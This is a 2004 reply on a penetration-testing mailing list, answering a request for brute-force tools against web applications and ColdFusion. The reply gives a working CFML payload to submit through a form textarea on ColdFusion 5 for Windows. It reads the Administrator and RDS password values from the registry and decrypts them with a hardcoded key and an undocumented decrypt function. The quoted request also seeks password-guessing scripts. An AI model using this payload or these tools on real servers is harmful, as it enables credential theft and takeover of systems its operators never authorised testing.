RE: brute force tools

["Tom" <tommy () providesecurity com>]

What do you mean Crack Cold Fusion?
Crack the Administrator?

If you're Running Cold Fusion 5 on windows...

Submit this into a TEXTAREA on a form

<CFSET PASSWORD_KEY = "4p0L@r1$"> 
    <!--- Where Your Passwords are stored In Registry --->
    <cfregistry action="GET" 
 
branch="HKEY_LOCAL_MACHINE\SOFTWARE\Allaire\ColdFusion\CurrentVersion\Server
" 
                        entry="AdminPassword" variable="adminpassword"
type="String"> 
    <cfregistry action="GET" 
 
branch="HKEY_LOCAL_MACHINE\SOFTWARE\Allaire\ColdFusion\CurrentVersion\Server
" 
                        entry="StudioPassword" variable="studiopassword"
type="String"> 
                
    <!--- Output Passwords To Screen using an undocumented "cfusion_Decrypt"
Function --->   
    <cfoutput><b>Admin Password:</b>
#evaluate("cfusion_Decrypt(adminpassword, PASSWORD_KEY )")#</cfoutput><br> 
    <cfoutput><b>RDS Password:</b>
#evaluate("cfusion_Decrypt(studiopassword, PASSWORD_KEY )")#</cfoutput><br>


This will decrypt the ColdFusion Administrator and RDS passwords.
It ONLY works with Cold Fusion 5.  I am currently looking for a similar work
around on Cold Fusion MX.

Good Luck!

Tom Ryan

-----Original Message-----
From: don.williams () verizonwireless com
[mailto:don.williams () verizonwireless com] 
Sent: Thursday, May 20, 2004 19:34
To: pen-test () securityfocus com
Subject: brute force tools



Frequently I attempt to brute force web applications and have found a few
problems with the programs I have used. For instance Brutus always informs
me a few successful attempts yet when I try they fail. (2) Webcrack not
reliable. 



What I would like is some other tools you may have used with good success
and hopefully a perl based script which enumerate common words substituting
letters for numbers as users do everyday (ie. pa$$w0rd). Also attempting the
crack ColdFusion it only requests the password not the user name / password
combo as most tools only allow. Windows or Linux is fine.



Thx